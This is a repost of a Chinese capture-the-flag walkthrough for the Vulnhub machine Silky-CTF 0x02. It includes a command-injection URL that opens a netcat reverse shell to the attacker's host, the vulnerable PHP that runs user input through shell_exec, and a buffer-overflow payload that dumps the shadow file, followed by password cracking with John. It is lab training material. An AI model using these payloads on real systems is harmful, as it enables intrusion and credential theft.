经验首页 前端设计 程序设计 Java相关 移动开发 数据库/运维 软件/图像 大数据/云计算 其他经验
当前位置:技术经验 » 其他 » 网络安全 » 查看文章
Silky-CTF: 0x02 Vulhub Walkthrough - APT-101
来源:cnblogs  作者:APT-101  时间:2019/9/23 8:50:10  对本文有异议

靶机地址:

https://www.vulnhub.com/entry/silky-ctf-0x02,307/

主机扫描:

 

 

HTTP进行目录爆破

 

 

 

 

尝试SQL注入会被封掉IP

经过尝试发现username字段存在命令执行的漏洞

我们执行进行shell反弹

http://10.10.202.131/admin.php?username=nc%20-e%20/bin/bash%2010.10.202.132%201234&password=123456

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

 

 

 

amdin.php

<?php
if(isset($_GET["username"])){
echo shell_exec($_GET["username"]);
if($_GET["username"] != "Admin" && $_GET["password"] != "ufoundmypasswordlolbutidontthinkso")
echo "Falscher Nutzernamen oder falsches Passwort";
}
?>

接下来进行提权操作:

find / -perm -g=s -type f 2>/dev/null

 

 

 

 

看起来应该是利用缓冲区溢出,导入shadow文件,这里我们要构造十六进制的payload

./cat_shadow $(python -c 'print "A"*64 + "\x62\x59\x6c\x49"')

 

破解密码

 

 

╰─ john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt

 

 

 OVER!

原文链接:http://www.cnblogs.com/hack404/p/11563065.html

 友情链接:直通硅谷  点职佳  北美留学生论坛

本站QQ群:前端 618073944 | Java 606181507 | Python 626812652 | C/C++ 612253063 | 微信 634508462 | 苹果 692586424 | C#/.net 182808419 | PHP 305140648 | 运维 608723728

W3xue 的所有内容仅供测试,对任何法律问题及风险不承担任何责任。通过使用本站内容随之而来的风险与本站无关。
关于我们  |  意见建议  |  捐助我们  |  报错有奖  |  广告合作、友情链接(目前9元/月)请联系QQ:27243702 沸活量
皖ICP备17017327号-2 皖公网安备34020702000426号